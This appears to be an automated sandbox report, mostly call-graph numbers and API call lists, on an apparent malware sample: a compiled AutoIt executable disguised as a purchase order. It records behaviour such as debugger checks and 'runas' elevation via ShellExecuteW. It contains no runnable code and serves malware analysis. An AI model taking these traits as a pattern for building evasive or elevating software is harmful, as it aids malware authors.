88225->88980 88226->88183 88226->88184 88226->88186 88226->88189 88226->88195 88226->88202 88226->88204 88226->88214 88226->88216 88226->88217 88226->88221 88228 42a452 88226->88228 88232 40a780 259 API calls 88226->88232 88979 40c4e0 259 API calls 88226->88979 88981 40e270 VariantClear moneypunct 88226->88981 88228->88179 88230->88171 88232->88226 88233 402780 52 API calls 88233->88253 88235 408f40 VariantClear 88266 40a162 moneypunct _memmove 88235->88266 88236 41130a 51 API calls __cinit 88236->88253 88237 4115d7 52 API calls 88237->88253 88239 40a11b 88238->88239 88241 42a4b4 VariantClear 88238->88241 88238->88266 88246 40a12d moneypunct 88239->88246 88994 40e270 VariantClear moneypunct 88239->88994 88240 40a780 259 API calls 88240->88253 88241->88246 88243 401980 53 API calls 88243->88253 88245 4115d7 52 API calls 88245->88266 88246->88245 88246->88266 88249 44a801 52 API calls 88249->88253 88250 42a74d VariantClear 88250->88266 88251 40a368 88254 42aad4 88251->88254 88261 40a397 88251->88261 88252 40e270 VariantClear 88252->88266 88253->88196 88253->88209 88253->88230 88253->88233 88253->88236 88253->88237 88253->88240 88253->88243 88253->88249 88253->88255 88259 409c95 88253->88259 88988 45f508 52 API calls 88253->88988 88989 403e10 53 API calls 88253->88989 88990 408e80 VariantClear 88253->88990 88998 46fe90 VariantClear VariantClear moneypunct 88254->88998 88991 47390f VariantClear 88255->88991 88256 42a7e4 VariantClear 88256->88266 88257 42a886 VariantClear 88257->88266 88259->86917 88260 40a3ce 88261->88260 88286 40a42c moneypunct 88261->88286 88977 40b400 VariantClear VariantClear moneypunct 88261->88977 88264 4115d7 52 API calls 88264->88266 88266->88235 88266->88250 88266->88251 88266->88252 88266->88254 88266->88256 88266->88257 88266->88264 88268 4115d7 52 API calls 88266->88268 88995 470870 52 API calls 88266->88995 88996 408e80 VariantClear 88266->88996 88997 44ccf1 VariantClear moneypunct 88266->88997 88270 42a5a6 VariantInit VariantCopy 88268->88270 88270->88266 88275 42a5c6 VariantClear 88270->88275 88275->88266 88289 40a650 moneypunct 88289->86917 88293->86917 88294->86866 88295->86872 88296->86917 88297->86917 88298->86917 88299->86917 88300->86923 88301->86923 88302->86923 88303->86923 88304->86923 88305->86923 88306->86923 88308 403cdf 88307->88308 88309 408f40 VariantClear 88308->88309 88310 403ce7 88309->88310 88310->86911 88311->86923 88312->86923 88313->86917 88314->86863 88315->88036 88317 453439 88316->88317 88319 453419 88316->88319 88317->88039 88318 45342f 88318->88039 88319->88318 88379 4531b1 85 API calls 5 library calls 88319->88379 88321 453425 88321->88039 88322->88045 88323->88047 88324->88031 88325->88023 88379->88321 88389->88084 88390->88088 88391->88099 88392->88105 88393->88092 88394->88119 88395->88132 88396->88138 88397->88119 88398->88140 88399->88119 88400->88140 88401->88126 88402->88140 88403->88123 88404->88140 88405->88140 88406->88117 88408 4289d2 88407->88408 88409 408db3 88407->88409 88441 45e737 90 API calls 3 library calls 88408->88441 88437 40bec0 88409->88437 88412 4289e5 88442 45e737 90 API calls 3 library calls 88412->88442 88414 40ba10 52 API calls 88420 408dc9 88414->88420 88415 428a05 88416 408f40 VariantClear 88415->88416 88422 408e5a 88416->88422 88417 40a780 259 API calls 88417->88420 88418 408e64 88419 408f40 VariantClear 88418->88419 88419->88422 88420->88412 88420->88414 88420->88415 88420->88417 88420->88418 88421 408f40 VariantClear 88420->88421 88420->88422 88421->88420 88422->88145 88424 408f40 VariantClear 88423->88424 88425 403d20 88424->88425 88426 403cd0 VariantClear 88425->88426 88427 403d4d 88426->88427 88444 475596 88427->88444 88447 46e1a6 88427->88447 88495 46f993 88427->88495 88534 4813fa 88427->88534 88544 4755ad 88427->88544 88547 467897 88427->88547 88428 403d76 88428->88143 88428->88154 88435->88143 88436->88146 88438 40bed0 88437->88438 88439 40bef2 88438->88439 88443 45e737 90 API calls 3 library calls 88438->88443 88439->88420 88441->88412 88442->88415 88443->88439 88591 475077 88444->88591 88448 46e1c0 88447->88448 88449 4533eb 85 API calls 88448->88449 88451 46e1dc 88449->88451 88450 46e483 88450->88428 88451->88450 88452 46e2e7 88451->88452 88453 46e1e9 88451->88453 88455 40f760 128 API calls 88452->88455 88454 45340c 85 API calls 88453->88454 88462 46e1f4 _wcscpy _wcschr 88454->88462 88456 46e2f7 88455->88456 88496 40e710 53 API calls 88495->88496 88497 46f9ba 88496->88497 88498 4115d7 52 API calls 88497->88498 88504 46fa26 88497->88504 88499 46f9d3 88498->88499 88500 46f9df 88499->88500 88825 40da60 53 API calls 88499->88825 88503 4533eb 85 API calls 88500->88503 88501 46fa38 88501->88428 88504->88501 88509 46fa7a 88504->88509 88811 44c285 88504->88811 88510 46fb17 88509->88510 88511 46fa99 88509->88511 88513 4115d7 52 API calls 88511->88513 88535 45340c 85 API calls 88534->88535 88536 481438 88535->88536 88537 402880 95 API calls 88536->88537 88538 48143f 88537->88538 88539 481465 88538->88539 88540 40a780 259 API calls 88538->88540 88541 40e710 53 API calls 88539->88541 88543 481469 88539->88543 88540->88539 88543->88428 88545 475077 126 API calls 88544->88545 88546 4755c0 88545->88546 88546->88428 88548 4678bb 88547->88548 88549 467954 88548->88549 88552 45340c 85 API calls 88548->88552 88550 4115d7 52 API calls 88549->88550 88577 467964 88549->88577 88551 467989 88550->88551 88553 467995 88551->88553 88973 40da60 53 API calls 88551->88973 88554 4678f6 88552->88554 88558 4533eb 85 API calls 88553->88558 88556 413a0e __wsplitpath 46 API calls 88554->88556 88557 4678fc 88556->88557 88560 401b10 52 API calls 88557->88560 88577->88428 88642 4533eb 88591->88642 88594 4750ee 88597 408f40 VariantClear 88594->88597 88595 475129 88646 4646e0 88595->88646 88602 4750f5 88597->88602 88643 453404 88642->88643 88644 4533f8 88642->88644 88643->88594 88643->88595 88644->88643 88718 4531b1 85 API calls 5 library calls 88644->88718 88719 4536f7 53 API calls 88646->88719 88718->88643 88847 443d73 88811->88847 88825->88500 88852 40df90 88847->88852 88973->88553 88976->88162 88977->88260 88978->88178 88979->88226 88980->88289 88981->88226 88982->88198 88983->88222 88984->88188 88985->88192 88986->88194 88987->88253 88988->88253 88989->88253 88990->88253 88991->88209 88992->88228 88993->88215 88994->88246 88995->88266 88996->88266 88997->88266 88998->88260 89005->88228 89006->88182 89007 42d154 89008 480a8d 259 API calls 89007->89008 89009 42d161 89008->89009 89010 480a8d 259 API calls 89009->89010 89010->89009 89011 42b14b 89018 40bc10 89011->89018 89013 42b159 89014 4096a0 398 API calls 89013->89014 89015 42b177 89014->89015 89029 44b92d VariantClear 89015->89029 89017 42bc5b 89019 40bc24 89018->89019 89020 40bc17 89018->89020 89021 40bc2a 89019->89021 89022 40bc3c 89019->89022 89030 408e80 VariantClear 89020->89030 89031 408e80 VariantClear 89021->89031 89025 4115d7 52 API calls 89022->89025 89028 40bc43 89025->89028 89026 40bc1f 89026->89013 89027 40bc33 89027->89013 89028->89013 89029->89017 89030->89026 89031->89027 89032 425b2b 89037 40f000 89032->89037 89036 425b3a 89038 4115d7 52 API calls 89037->89038 89039 40f007 89038->89039 89040 4276ea 89039->89040 89046 40f030 89039->89046 89045 41130a 51 API calls __cinit 89045->89036 89047 40f039 89046->89047 89048 40f01a 89046->89048 89076 41130a 51 API calls __cinit 89047->89076 89050 40e500 89048->89050 89051 40bc70 52 API calls 89050->89051 89052 40e515 GetVersionExW 89051->89052 89053 402160 52 API calls 89052->89053 89054 40e557 89053->89054 89077 40e660 89054->89077 89060 427674 89064 4276c6 GetSystemInfo 89060->89064 89062 40e5e0 89065 4276d5 GetSystemInfo 89062->89065 89091 40efd0 89062->89091 89063 40e5cd GetCurrentProcess 89098 40ef20 LoadLibraryA GetProcAddress 89063->89098 89064->89065 89069 40e629 89095 40ef90 89069->89095 89072 40e641 FreeLibrary 89073 40e644 89072->89073 89074 40e653 FreeLibrary 89073->89074 89075 40e656 89073->89075 89074->89075 89075->89045 89076->89048 89078 40e667 89077->89078 89079 42761d 89078->89079 89080 40c600 52 API calls 89078->89080 89081 40e55c 89080->89081 89082 40e680 89081->89082 89083 40e687 89082->89083 89084 427616 89083->89084 89085 40c600 52 API calls 89083->89085 89086 40e566 89085->89086 89086->89060 89087 40ef60 89086->89087 89088 40e5c8 89087->89088 89089 40ef66 LoadLibraryA 89087->89089 89088->89062 89088->89063 89089->89088 89090 40ef77 GetProcAddress 89089->89090 89090->89088 89092 40e620 89091->89092 89093 40efd6 LoadLibraryA 89091->89093 89092->89064 89092->89069 89093->89092 89094 40efe7 GetProcAddress 89093->89094 89094->89092 89099 40efb0 LoadLibraryA GetProcAddress 89095->89099 89097 40e632 GetNativeSystemInfo 89097->89072 89097->89073 89098->89062 89099->89097 89100 425b5e 89105 40c7f0 89100->89105 89104 425b6d 89140 40db10 52 API calls 89105->89140 89107 40c82a 89141 410ab0 6 API calls 89107->89141 89109 40c86d 89110 40bc70 52 API calls 89109->89110 89111 40c877 89110->89111 89112 40bc70 52 API calls 89111->89112 89113 40c881 89112->89113 89114 40bc70 52 API calls 89113->89114 89115 40c88b 89114->89115 89116 40bc70 52 API calls 89115->89116 89117 40c8d1 89116->89117 89118 40bc70 52 API calls 89117->89118 89119 40c991 89118->89119 89142 40d2c0 52 API calls 89119->89142 89121 40c99b 89143 40d0d0 53 API calls 89121->89143 89123 40c9c1 89124 40bc70 52 API calls 89123->89124 89125 40c9cb 89124->89125 89144 40e310 53 API calls 89125->89144 89127 40ca28 89128 408f40 VariantClear 89127->89128 89129 40ca30 89128->89129 89130 408f40 VariantClear 89129->89130 89131 40ca38 GetStdHandle 89130->89131 89132 429630 89131->89132 89133 40ca87 89131->89133 89132->89133 89134 429639 89132->89134 89139 41130a 51 API calls __cinit 89133->89139 89145 4432c0 57 API calls 89134->89145 89136 429641 89146 44b6ab CreateThread 89136->89146 89138 42964f CloseHandle 89138->89133 89139->89104 89140->89107 89141->89109 89142->89121 89143->89123 89144->89127 89145->89136 89146->89138 89147 44b5cb 58 API calls 89146->89147 89148 425b6f 89153 40dc90 89148->89153 89152 425b7e 89154 40bc70 52 API calls 89153->89154 89155 40dd03 89154->89155 89162 40f210 89155->89162 89157 426a97 89159 40dd96 89159->89157 89160 40ddb7 89159->89160 89165 40dc00 52 API calls 2 library calls 89159->89165 89161 41130a 51 API calls __cinit 89160->89161 89161->89152 89166 40f250 RegOpenKeyExW 89162->89166 89164 40f230 89164->89159 89165->89159 89167 425e17 89166->89167 89168 40f275 RegQueryValueExW 89166->89168 89167->89164 89169 40f2c3 RegCloseKey 89168->89169 89170 40f298 89168->89170 89169->89164 89171 40f2a9 RegCloseKey 89170->89171 89172 425e1d 89170->89172 89171->89164 89173 39727f8 89187 3970448 89173->89187 89175 39728b8 89190 39726e8 89175->89190 89193 39738e8 GetPEB 89187->89193 89189 3970ad3 89189->89175 89191 39726f1 Sleep 89190->89191 89192 39726ff 89191->89192 89194 3973912 89193->89194 89194->89189
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 004096C1
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • _memmove.LIBCMT ref: 0040970C
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                    • _memmove.LIBCMT ref: 00409D96
                                                    • _memmove.LIBCMT ref: 0040A6C4
                                                    • _memmove.LIBCMT ref: 004297E5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                    • String ID:
                                                    • API String ID: 2383988440-0
                                                    • Opcode ID: b54ad723fa570b45759592299e2c1711d28994d12652a3fabbfe3e8326de7dbf
                                                    • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                    • Opcode Fuzzy Hash: b54ad723fa570b45759592299e2c1711d28994d12652a3fabbfe3e8326de7dbf
                                                    • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                      • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\[Purchase Order] PO2411024.exe,00000104,?), ref: 00401F4C
                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                      • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                    • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                    • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\[Purchase Order] PO2411024.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                      • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                    • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                    • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                      • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                      • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                      • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                      • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                      • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                      • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                      • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                      • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                      • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                    • String ID: C:\Users\user\Desktop\[Purchase Order] PO2411024.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                    • API String ID: 2495805114-2531433172
                                                    • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                    • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                    • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                    • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2087 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 2096 40e582-40e583 2087->2096 2097 427674-427679 2087->2097 2100 40e585-40e596 2096->2100 2101 40e5ba-40e5cb call 40ef60 2096->2101 2098 427683-427686 2097->2098 2099 42767b-427681 2097->2099 2103 427693-427696 2098->2103 2104 427688-427691 2098->2104 2102 4276b4-4276be 2099->2102 2105 427625-427629 2100->2105 2106 40e59c-40e59f 2100->2106 2119 40e5ec-40e60c 2101->2119 2120 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2101->2120 2121 4276c6-4276ca GetSystemInfo 2102->2121 2103->2102 2110 427698-4276a8 2103->2110 2104->2102 2112 427636-427640 2105->2112 2113 42762b-427631 2105->2113 2108 40e5a5-40e5ae 2106->2108 2109 427654-427657 2106->2109 2115 40e5b4 2108->2115 2116 427645-42764f 2108->2116 2109->2101 2114 42765d-42766f 2109->2114 2117 4276b0 2110->2117 2118 4276aa-4276ae 2110->2118 2112->2101 2113->2101 2114->2101 2115->2101 2116->2101 2117->2102 2118->2102 2122 40e612-40e623 call 40efd0 2119->2122 2123 4276d5-4276df GetSystemInfo 2119->2123 2120->2119 2131 40e5e8 2120->2131 2121->2123 2122->2121 2128 40e629-40e63f call 40ef90 GetNativeSystemInfo 2122->2128 2133 40e641-40e642 FreeLibrary 2128->2133 2134 40e644-40e651 2128->2134 2131->2119 2133->2134 2135 40e653-40e654 FreeLibrary 2134->2135 2136 40e656-40e65d 2134->2136 2135->2136
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                    • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                    • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                    • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                    • String ID: 0SH$v
                                                    • API String ID: 3363477735-350888836
                                                    • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                    • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                    • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                    • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: IsThemeActive$uxtheme.dll
                                                    • API String ID: 2574300362-3542929980
                                                    • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                    • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                    • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                    • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                    • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: FreeInfoLibraryParametersSystem
                                                    • String ID: v
                                                    • API String ID: 3403648963-2904040280
                                                    • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                    • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                    • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                    • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,00000000), ref: 004339C7
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 004339D8
                                                    • FindClose.KERNEL32(00000000), ref: 004339EB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                    • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                    • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                    • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                    • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                    • TranslateMessage.USER32(?), ref: 00409556
                                                    • DispatchMessageW.USER32(?), ref: 00409561
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Message$Peek$DispatchSleepTranslate
                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                    • API String ID: 1762048999-758534266
                                                    • Opcode ID: 6e5a84f50e6471acbdd4342343150298bef6cc2db92e63af5a75e0cfbba0f830
                                                    • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                    • Opcode Fuzzy Hash: 6e5a84f50e6471acbdd4342343150298bef6cc2db92e63af5a75e0cfbba0f830
                                                    • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
